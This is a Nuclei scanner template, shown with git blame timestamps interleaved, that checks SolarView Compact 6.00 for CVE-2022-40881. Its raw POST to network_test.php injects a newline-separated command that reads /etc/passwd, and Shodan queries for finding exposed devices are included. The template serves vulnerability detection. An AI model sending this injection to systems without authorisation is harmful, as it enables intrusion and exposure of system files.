2022-11-17 14:32:59 +00:00
|
|
|
id: CVE-2022-40881
|
|
|
|
|
|
|
|
info:
|
2022-11-18 08:19:07 +00:00
|
|
|
name: SolarView 6.00 - Remote Command Execution
|
2022-11-17 14:32:59 +00:00
|
|
|
author: For3stCo1d
|
|
|
|
severity: critical
|
|
|
|
description: |
|
2023-01-16 17:41:15 +00:00
|
|
|
SolarView Compact 6.00 is vulnerable to a command injection via network_test.php.
|
2023-09-27 15:51:13 +00:00
|
|
|
impact: |
|
|
|
|
Successful exploitation of this vulnerability allows an attacker to execute arbitrary commands on the target system.
|
2023-09-06 11:59:08 +00:00
|
|
|
remediation: |
|
|
|
|
Apply the latest patch or upgrade to a non-vulnerable version of SolarView.
|
2022-11-17 14:32:59 +00:00
|
|
|
reference:
|
|
|
|
- https://github.com/Timorlover/SolarView_Compact_6.0_rce_via_network_test.php
|
2022-11-17 16:02:12 +00:00
|
|
|
- https://github.com/advisories/GHSA-wx3r-88rg-whxq
|
2022-11-18 08:19:07 +00:00
|
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2022-40881
|
2024-05-31 19:23:20 +00:00
|
|
|
- https://github.com/KayCHENvip/vulnerability-poc
|
|
|
|
- https://github.com/Threekiii/Awesome-POC
|
2022-11-18 08:19:07 +00:00
|
|
|
classification:
|
2022-11-21 05:13:32 +00:00
|
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
|
|
|
cvss-score: 9.8
|
2022-11-18 08:19:07 +00:00
|
|
|
cve-id: CVE-2022-40881
|
2022-11-21 05:13:32 +00:00
|
|
|
cwe-id: CWE-77
|
2024-05-31 19:23:20 +00:00
|
|
|
epss-score: 0.95977
|
|
|
|
epss-percentile: 0.99469
|
|
|
|
cpe: cpe:2.3:h:contec:solarview_compact:-:*:*:*:*:*:*:*
|
2022-11-17 14:32:59 +00:00
|
|
|
metadata:
|
2023-06-04 08:13:42 +00:00
|
|
|
verified: true
|
2023-09-06 11:59:08 +00:00
|
|
|
max-request: 1
|
2023-07-11 19:49:27 +00:00
|
|
|
vendor: contec
|
2024-05-31 19:23:20 +00:00
|
|
|
product: solarview_compact
|
2024-06-07 10:04:29 +00:00
|
|
|
shodan-query:
|
|
|
|
- http.favicon.hash:"-244067125"
|
|
|
|
- cpe:"cpe:2.3:h:contec:solarview_compact"
|
2023-12-05 09:50:33 +00:00
|
|
|
tags: cve,cve2022,solarview,rce,lfi,contec
|
2022-11-17 14:32:59 +00:00
|
|
|
variables:
|
|
|
|
cmd: "cat${IFS}/etc/passwd"
|
|
|
|
|
2023-04-27 04:28:59 +00:00
|
|
|
http:
|
2022-11-17 14:32:59 +00:00
|
|
|
- raw:
|
|
|
|
- |
|
|
|
|
POST /network_test.php HTTP/1.1
|
|
|
|
Host: {{Hostname}}
|
|
|
|
Content-Type: application/x-www-form-urlencoded
|
|
|
|
|
|
|
|
host=%0a{{cmd}}%0a&command=ping
|
|
|
|
|
|
|
|
matchers-condition: and
|
|
|
|
matchers:
|
|
|
|
- type: regex
|
|
|
|
part: body
|
|
|
|
regex:
|
|
|
|
- "root:.*:0:0:"
|
|
|
|
|
|
|
|
- type: status
|
|
|
|
status:
|
|
|
|
- 200
|
2024-06-08 16:02:17 +00:00
|
|
|
# digest: 490a0046304402202676c7e62987d4879069afc20a7985de576ae70937053282e84ee6b3d12602680220469076fb4b5cbcdfd9832dbab7a42e2bf165a38d7243e5e16921ef1be94f2d4f:922c64590222798bb761d5b6d8e72950
|